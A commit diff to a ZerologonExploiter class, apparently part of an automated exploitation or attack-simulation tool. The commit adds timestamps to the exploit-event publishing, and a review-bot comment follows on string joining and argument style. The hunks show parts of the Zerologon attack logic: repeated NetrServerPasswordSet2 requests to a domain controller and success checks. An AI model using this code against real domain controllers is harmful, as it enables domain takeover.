Agent: Add timestamps to publish calls
parent
8eb3c94a94
commit
88d2bf7140
|
@ -187,19 +187,20 @@ class ZerologonExploiter(HostExploiter):
|
|||
|
||||
def _send_exploit_rpc_login_requests(self, rpc_con) -> bool:
|
||||
for _ in interruptible_iter(range(0, self.MAX_ATTEMPTS), self.interrupt):
|
||||
exploit_attempt_result = self.try_exploit_attempt(rpc_con)
|
||||
exploit_attempt_result, timestamp = self.try_exploit_attempt(rpc_con)
|
||||
|
||||
is_exploited = self.assess_exploit_attempt_result(exploit_attempt_result)
|
||||
is_exploited = self.assess_exploit_attempt_result(exploit_attempt_result, timestamp)
|
||||
if is_exploited:
|
||||
return True
|
||||
|
||||
return False
|
||||
|
||||
def try_exploit_attempt(self, rpc_con) -> Optional[object]:
|
||||
def try_exploit_attempt(self, rpc_con) -> Tuple[Optional[object], float]:
|
||||
error_message = ""
|
||||
timestamp = time()
|
||||
try:
|
||||
exploit_attempt_result = self.attempt_exploit(rpc_con)
|
||||
return exploit_attempt_result
|
||||
return exploit_attempt_result, timestamp
|
||||
except nrpc.DCERPCSessionError as err:
|
||||
# Failure should be due to a STATUS_ACCESS_DENIED error.
|
||||
# Otherwise, the attack is probably not working.
|
||||
|
@ -210,12 +211,9 @@ class ZerologonExploiter(HostExploiter):
|
|||
error_message = f"Unexpected error: {err}"
|
||||
logger.info(error_message)
|
||||
|
||||
self._publish_exploitation_event(
|
||||
success=False,
|
||||
error_message=error_message,
|
||||
)
|
||||
self._publish_exploitation_event(timestamp, False, error_message=error_message)
|
||||
|
||||
return None
|
||||
return None, timestamp
|
||||
|
||||
def attempt_exploit(self, rpc_con: rpcrt.DCERPC_v5) -> object:
|
||||
request = nrpc.NetrServerPasswordSet2()
|
||||
|
@ -236,25 +234,24 @@ class ZerologonExploiter(HostExploiter):
|
|||
request["SecureChannelType"] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
|
||||
request["Authenticator"] = authenticator
|
||||
|
||||
def assess_exploit_attempt_result(self, exploit_attempt_result) -> bool:
|
||||
def assess_exploit_attempt_result(self, exploit_attempt_result, timestamp: float) -> bool:
|
||||
if exploit_attempt_result:
|
||||
if exploit_attempt_result["ErrorCode"] == 0:
|
||||
self.report_login_attempt(result=True, user=self.dc_name)
|
||||
_exploited = True
|
||||
logger.info("Exploit complete!")
|
||||
|
||||
self._publish_exploitation_event(success=True)
|
||||
self._publish_exploitation_event(timestamp, True)
|
||||
else:
|
||||
self.report_login_attempt(result=False, user=self.dc_name)
|
||||
_exploited = False
|
||||
error_message = f"Non-zero return code: {exploit_attempt_result['ErrorCode']}."
|
||||
error_message = (
|
||||
f"Non-zero return code: {exploit_attempt_result['ErrorCode']}."
|
||||
"Something went wrong."
|
||||
)
|
||||
logger.info(error_message)
|
||||
|
||||
self._publish_exploitation_event(
|
||||
success=False,
|
||||
error_message=error_message,
|
||||
)
|
||||
self._publish_exploitation_event(timestamp, False, error_message=error_message)
|
||||
return _exploited
|
||||
|
||||
return False
|
||||
|
|
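Review bot: In `assess_exploit_attempt_result`, the failure message split across two string literals joins them with no separator, so it renders as `Non-zero return code: <code>.Something went wrong.`; assuming the parenthesised form is the new side (this rendering has lost the +/- markers), the second literal should start with a space: `" Something went wrong."`. The publish calls now pass the outcome positionally (`timestamp, True` / `timestamp, False`) where the old calls used `success=`; keeping the keyword, as in `self._publish_exploitation_event(timestamp, success=False, error_message=error_message)`, makes a swapped argument harder to miss, though the helper's signature is not on this page. `try_exploit_attempt` takes `time()` before it calls `attempt_exploit`, so the published timestamp marks when the request was sent rather than when the result came back; a one-line docstring saying so, and describing the new tuple return, would help anyone lining these events up with domain-controller logs. The bodies of `try_exploit_attempt` and `attempt_exploit` continue outside the visible hunks.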